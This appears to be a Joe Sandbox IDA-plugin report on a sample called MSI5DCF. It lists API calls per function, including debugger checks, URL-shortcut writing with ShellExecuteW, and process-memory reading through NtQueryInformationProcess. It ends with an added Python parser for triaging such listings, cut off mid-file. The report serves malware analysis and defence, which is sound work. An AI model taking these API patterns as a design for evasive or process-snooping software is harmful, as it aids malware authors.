                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B1387B
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B138C5
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B1398B
                                                                        Similarity
                                                                        • API ID: InfoLocale$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 661929714-0
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AFC4AE
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AFC4B8
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AFC4C5
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        APIs
                                                                        • LoadResource.KERNEL32(00000000,00000000,B7207CF4,00000001,00000000,?,00000000,00B19360,000000FF,?,00AD1D1C,00000010,?,?,?,-00000010), ref: 00AD1D9B
                                                                        • LockResource.KERNEL32(00000000,?,00AD1D1C,00000010,?,?,?,-00000010,00B19340,000000FF,?,00AD202C,?,00000000,00B1938D,000000FF), ref: 00AD1DA6
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00AD1D1C,00000010,?,?,?,-00000010,00B19340,000000FF,?,00AD202C,?,00000000,00B1938D), ref: 00AD1DB4
                                                                        Similarity
                                                                        • API ID: Resource$LoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 2853612939-0
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        APIs
                                                                        • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00B0D5D7,00000000,00000000,00000000), ref: 00B0D496
                                                                        Similarity
                                                                        • API ID: InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 565725191-0
                                                                        APIs
                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B0DB2B,?,?,00000008,?,?,00B16AD4,00000000), ref: 00B0DD5D
                                                                        Similarity
                                                                        • API ID: ExceptionRaise
                                                                        • String ID:
                                                                        • API String ID: 3997070919-0
                                                                        • Opcode ID: f4ee5875562b019cce59b7ad83cc654e675451f529fe6977aee4c08744bd5169
                                                                        • Instruction ID: 13273d3b28e42d716d9269cef9e396a7bcfdebfe6983daffa3052d47851a38fe
                                                                        • Opcode Fuzzy Hash: f4ee5875562b019cce59b7ad83cc654e675451f529fe6977aee4c08744bd5169
                                                                        • Instruction Fuzzy Hash: DAB11A712106099FDB25CF68C48AB657FE0FF45364F258698E89ACF2E1C735E992CB40
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AF8032
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: 374b5696b2adb4d46f0d6cb7165e718a0e6898eca2b6a5b62e44b59722acedb7
                                                                        • Instruction ID: c123f86a17d599a7a0e030e7ed5625339e53c34371ec2758343920845f1d5461
                                                                        • Opcode Fuzzy Hash: 374b5696b2adb4d46f0d6cb7165e718a0e6898eca2b6a5b62e44b59722acedb7
                                                                        • Instruction Fuzzy Hash: 4D519EB1A11219CBDB19CFA5E8857AEB7F0FB48300F24816AE500EB250DB79EA04CF54
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: 015b81619f0d21ffff6312f8a9d81b485f96244bf2ecb9f869b0ae3c4d41f21d
                                                                        • Instruction ID: 19d3609e696b233eabc769581950c9936301e3b771cb1dc625546bdf0b8821dd
                                                                        • Opcode Fuzzy Hash: 015b81619f0d21ffff6312f8a9d81b485f96244bf2ecb9f869b0ae3c4d41f21d
                                                                        • Instruction Fuzzy Hash: 6FE1BC3060060D8FCB24DFA8C580ABEB7F1FF49314F248669F65A9B2A1D730AD42CB55
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: 019cd3350c58bc5b674743875f7145230c53436d9c6d2d943534e6725c77e5cd
                                                                        • Instruction ID: 85a17ef500d67ba8b3d367031985f9202b0dac25be4a2e93770094cead1031e6
                                                                        • Opcode Fuzzy Hash: 019cd3350c58bc5b674743875f7145230c53436d9c6d2d943534e6725c77e5cd
                                                                        • Instruction Fuzzy Hash: 95C1E07090064E8FCB28EFA8C480A7EFBF1AF45354F244679F696972A1D730AD45CB91
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B13ACE
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 3736152602-0
                                                                        • Opcode ID: 76560efab023b9dc001b4d1584e4e451831d8067994e8301005ebb6c904dc8b6
                                                                        • Instruction ID: 82a631c0492339ffe2fdc51a42143294628d28897dab4fbf79f3d735c3978d82
                                                                        • Opcode Fuzzy Hash: 76560efab023b9dc001b4d1584e4e451831d8067994e8301005ebb6c904dc8b6
                                                                        • Instruction Fuzzy Hash: DD21B372615256ABDB18AB25DC42EFB77E8EF44B10F5040BAF905D6181FB34DE848750
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • EnumSystemLocalesW.KERNEL32(00B13827,00000001,00000000,?,-00000050,?,00B13E58,00000000,?,?,?,00000055,?), ref: 00B13773
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: 92967064135e8c6034085761a123a4cefb2bbd96de3ce25672b5a0a8c4e337e5
                                                                        • Instruction ID: e172b54010cd2775d174b75a134c59480b89f3a3a657a176575901c4058380f5
                                                                        • Opcode Fuzzy Hash: 92967064135e8c6034085761a123a4cefb2bbd96de3ce25672b5a0a8c4e337e5
                                                                        • Instruction Fuzzy Hash: 9711E9BB6007055FDB18AF39C8919FABBD1FF84768B54446CE54647A80E771AE82C740
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B13A43,00000000,00000000,?), ref: 00B13CD5
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 3736152602-0
                                                                        • Opcode ID: 35f85900efa2d7cfcba19cfad228bc428d4f8ee2217d66b61fd053fecb143b38
                                                                        • Instruction ID: ca1cfa2f2ef16cbf6f3dfb43ce70e69bbbd9b6d6ed3faf1153288c34a2cb8050
                                                                        • Opcode Fuzzy Hash: 35f85900efa2d7cfcba19cfad228bc428d4f8ee2217d66b61fd053fecb143b38
                                                                        • Instruction Fuzzy Hash: 06F08632600215BBDB245725DC46AFA7BE8EB40B54F6544B4EC06A3180FA74FE82C690
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • EnumSystemLocalesW.KERNEL32(00B13A7A,00000001,?,?,-00000050,?,00B13E1C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00B137E6
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: d05be0a4cd3c78080bcaaa9561d86067f66d2dbe05f18624e3885d722b519944
                                                                        • Instruction ID: d78b6f820b80ae87e7119da0d376af37ea33b8542868652f5ebba78a0e1dd549
                                                                        • Opcode Fuzzy Hash: d05be0a4cd3c78080bcaaa9561d86067f66d2dbe05f18624e3885d722b519944
                                                                        • Instruction Fuzzy Hash: B0F0C8B63003046FDB149F39D885ABA7BD5FF80B68B55446CF94547690E6719D428610
                                                                        APIs
                                                                          • Part of subcall function 00B072CA: EnterCriticalSection.KERNEL32(?,?,00B1163A,00000000,00B311A8,0000000C,00B11601,?,?,00B0C75E,?,?,00B0AFDA,00000001,00000364,?), ref: 00B072D9
                                                                        • EnumSystemLocalesW.KERNEL32(Function_0003C795,00000001,00B310C8,0000000C,00B0CBC4,?), ref: 00B0C7DA
                                                                        Similarity
                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                        • String ID:
                                                                        • API String ID: 1272433827-0
                                                                        • Opcode ID: 260547ac1b767fd1411ce792dcb31d7c79b5a4537532a2393d511556c60fde3a
                                                                        • Instruction ID: 96e14b5878c38fa46f0a2d559a40f6e8839c1f502c5cc8aaa0b6e0b5fc51bbb0
                                                                        • Opcode Fuzzy Hash: 260547ac1b767fd1411ce792dcb31d7c79b5a4537532a2393d511556c60fde3a
                                                                        • Instruction Fuzzy Hash: F3F03772A00214EFD710EF98E842B9D7BF0FB08720F20815AF4109B2E0DF7559448F40
                                                                        APIs
                                                                        • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00AF4EEC,00000000,00B2B6C9,00000004,00AF3D92,00B2B6C9,00000004,00AF41A5,00000000,00000000), ref: 00AF71DA
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 638454c095f62aae10af08532e7a28eee662139a461ab88e75c4218d76a63bb6
                                                                        • Instruction ID: 45e72896ed27497437bdbc08f07706798f41833543046091b76bb842a545ed74
                                                                        • Opcode Fuzzy Hash: 638454c095f62aae10af08532e7a28eee662139a461ab88e75c4218d76a63bb6
                                                                        • Instruction Fuzzy Hash: 14E0D872698208B6D7159BFC9D1FFFE7AE8D70470AF504241F702E50D1DAA4CB00D265
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • EnumSystemLocalesW.KERNEL32(00B1360F,00000001,?,?,?,00B13E7A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B136ED
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: d1f9153c6c32538367507ec004c2ebabb7e0a25cdf000d232a35d80fd7d16bb3
                                                                        • Instruction ID: 1dc0022e465d1c338e1a15907cfd70ae165f6aa5030581050ab6134e6db24b7a
                                                                        • Opcode Fuzzy Hash: d1f9153c6c32538367507ec004c2ebabb7e0a25cdf000d232a35d80fd7d16bb3
                                                                        • Instruction Fuzzy Hash: 1FF0E53630024967CB04AF39D8566AA7FD4EFC1B10B9A4098EA058B390D671D983C750
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00B0A4B1,?,20001004,00000000,00000002,?,?,00B09AB3), ref: 00B0CD53
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: d50adc65c9ccfa2bf58e64ee2411d6004d54fa01d28652cc2144fdfaf4bdb00b
                                                                        • Instruction ID: 8981456a03a9fb9155c8609f85213886db6375abe52bfe2c05331e7e5a5e2ea3
                                                                        • Opcode Fuzzy Hash: d50adc65c9ccfa2bf58e64ee2411d6004d54fa01d28652cc2144fdfaf4bdb00b
                                                                        • Instruction Fuzzy Hash: 15E04F35500218BBCF122F60DC04AAE7F56EF44750F108261FD05671A1CF319D21AAD4
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0002855F,00AF7E51), ref: 00AF8558
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AD880D
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD8860
• LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD886F
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD888B
• WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD896B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD8977
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD89B3
• LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD89D2
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD89EF
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD8A83
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00AD8ACE
• ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00AD8B1C
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD8B4B
Strings
Similarity
• API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
• String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
• API String ID: 2199533872-3004881174
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(00B34AF8,00000FA0,?,?,00AF7747), ref: 00AF7775
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00AF7747), ref: 00AF7780
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00AF7747), ref: 00AF7791
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AF77A3
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AF77B1
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00AF7747), ref: 00AF77D4
• DeleteCriticalSection.KERNEL32(00B34AF8,00000007,?,?,00AF7747), ref: 00AF77F0
• CloseHandle.KERNEL32(00000000,?,?,00AF7747), ref: 00AF7800
Strings
• WakeAllConditionVariable, xrefs: 00AF77A9
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AF777B
• kernel32.dll, xrefs: 00AF778C
• SleepConditionVariableCS, xrefs: 00AF779D
Similarity
• API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
• String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2565136772-3242537097
APIs
• LocalAlloc.KERNEL32(00000040,00000018,B7207CF4,?,00000000), ref: 00ADF076
• std::_Lockit::_Lockit.LIBCPMT ref: 00ADF0B3
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADF11D
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADF2B9
• std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF376
• Concurrency::cancel_current_task.LIBCPMT ref: 00ADF39E
Strings
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name$false$true
• API String ID: 975656625-1062449267
APIs
• OpenProcess.KERNEL32(00000400,00000000,?,B7207CF4,?,00000000), ref: 00AD6AC2
• OpenProcess.KERNEL32(00000400,00000000,00000000,?,B7207CF4,?,00000000), ref: 00AD6AE3
• GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,B7207CF4,?,00000000), ref: 00AD6B16
• GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,B7207CF4,?,00000000), ref: 00AD6B27
• CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6B45
• CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6B61
• CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6B89
• CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6BA5
• CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6BC3
• CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6BDF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle$Process$OpenTimes
                                                                        • String ID:
                                                                        • API String ID: 1711917922-0
                                                                        • Opcode ID: 888223c1e89b9ca1996809db1504b151451d48b9a28422d253507a65ac074d7c
                                                                        • Instruction ID: 965cd6be9cf521e2023e3d157966113aa04c91c7af747c4264a2de28c3bbfa49
                                                                        • Opcode Fuzzy Hash: 888223c1e89b9ca1996809db1504b151451d48b9a28422d253507a65ac074d7c
                                                                        • Instruction Fuzzy Hash: E8514B71D01218ABDB14CF98D984BEEFBF5AB48724F20825AE519B7390C7745D05CBA8
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF083B
                                                                          • Part of subcall function 00AE780A: __EH_prolog3.LIBCMT ref: 00AE7811
                                                                          • Part of subcall function 00AE780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AE781B
                                                                          • Part of subcall function 00AE780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE788C
                                                                         Memory Dump Source
                                                                         • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1538362411-2891247106
                                                                        • Opcode ID: c71a2a0d0d52cde304d9611280db95ceba89bf8367f6df117e24ba36201359e3
                                                                        • Instruction ID: 65531203a239f0b215dcf4babe518760b8a4e025b6359f79eff1db28d0513244
                                                                        • Opcode Fuzzy Hash: c71a2a0d0d52cde304d9611280db95ceba89bf8367f6df117e24ba36201359e3
                                                                        • Instruction Fuzzy Hash: 22C16D7254020EAFDF18DFE8C9A5DFA7BB8AB19344F144559FB42E7252E670DA00CB60
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF59E9
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5BD
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5E0
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC608
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC6A7
                                                                         Memory Dump Source
                                                                         • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1383202999-2891247106
                                                                        • Opcode ID: 4eedbf421449620a879746e6e0cf42a8d7637bc3108eddb15361dd667f811586
                                                                        • Instruction ID: 8609f683fbcce2a668c56afb0baf08715cf200202922b71cd527b845c675a648
                                                                        • Opcode Fuzzy Hash: 4eedbf421449620a879746e6e0cf42a8d7637bc3108eddb15361dd667f811586
                                                                        • Instruction Fuzzy Hash: D1C14D7690050DAFDB19DFE8C999DFB7BB8AB09304F14461AFB06A7251E630DA50CB60
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF0C2B
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB52D
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB550
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB578
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB617
                                                                         Memory Dump Source
                                                                         • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1383202999-2891247106
                                                                        • Opcode ID: 2369990d837928dd2bf46ed08c5dda16d68c614acc2b8130e0fd4b76407e32f3
                                                                        • Instruction ID: 7aad531a07df5febb2bf1d4a772f209e311a7e07f4a469e290d68a24796b3a09
                                                                        • Opcode Fuzzy Hash: 2369990d837928dd2bf46ed08c5dda16d68c614acc2b8130e0fd4b76407e32f3
                                                                        • Instruction Fuzzy Hash: FEC14C7650010EAFDF28DFE8C9A5DFF7BB8AB19300F15451AFB46A6252D630DA50CB60
                                                                        APIs
                                                                          • Part of subcall function 00AD6090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD60F4
                                                                          • Part of subcall function 00AD6090: GetLastError.KERNEL32 ref: 00AD6190
                                                                        • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00AD6632
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 00AD668B
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD6712
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD67F6
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00AD686E
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00AD68C9
                                                                        • FreeLibrary.KERNEL32(?,?,00000000), ref: 00AD691E
                                                                        Strings
                                                                        • NtQueryInformationProcess, xrefs: 00AD662C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
                                                                        • String ID: NtQueryInformationProcess
                                                                        • API String ID: 253270903-2781105232
                                                                        • Opcode ID: a9ebc29d6e474ec3247605751a5e4f284a0e9c866b1e823d3b15e2f9cf881299
                                                                        • Instruction ID: f67b58c4e99a41743ec4452d987bc0e0b205881349b854a3a64f4e3c9948e47d
                                                                        • Opcode Fuzzy Hash: a9ebc29d6e474ec3247605751a5e4f284a0e9c866b1e823d3b15e2f9cf881299
                                                                        • Instruction Fuzzy Hash: D3B16170D10759DADB20CF64C9587AEBBF0FF48708F10465EE44AA7290D7B9A6C8CB91
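The two records above that matter most to a triage analyst are the OpenProcess/GetProcessTimes/CloseHandle function and the function that resolves NtQueryInformationProcess and then calls ReadProcessMemory three times with decreasing, partly fixed sizes. Picking such clusters out of a long IDA-plugin listing by hand is tedious, so the following Python is an added example (not part of the Joe Sandbox report or of its IDA plugin) that parses records in the report's own "APIs" / "Strings" line format and tags each function with the foreign-process capability its direct calls imply. The embedded listing is a constructed sample whose lines are copied verbatim from the two records above; the tagging rules, the tag names and the `PROCESS_*` access-mask decoding are the editor's own assumptions, not something the report states.

```python
"""Parse Joe Sandbox IDA-plugin function records ("APIs" / "Strings" lines) and
tag foreign-process capabilities. Added example: the rule set below is the
editor's own and is not taken from the report."""
import re

# Constructed sample: API and string lines copied from two records of this report.
SAMPLE_LISTING = """\
APIs
• OpenProcess.KERNEL32(00000400,00000000,?,B7207CF4,?,00000000), ref: 00AD6AC2
• GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,B7207CF4,?,00000000), ref: 00AD6B16
• CloseHandle.KERNEL32(00000000,?,B7207CF4,?,00000000), ref: 00AD6B45
Memory Dump Source
APIs
  • Part of subcall function 00AD6090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD60F4
  • Part of subcall function 00AD6090: GetLastError.KERNEL32 ref: 00AD6190
• GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00AD6632
• ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 00AD668B
• ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD6712
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00AD686E
Strings
• NtQueryInformationProcess, xrefs: 00AD662C
Memory Dump Source
"""

# One API line: optional "Part of subcall function <addr>:" prefix, then
# <api>.<MODULE>(<args>), ref: <addr>. The argument list is absent on some lines.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
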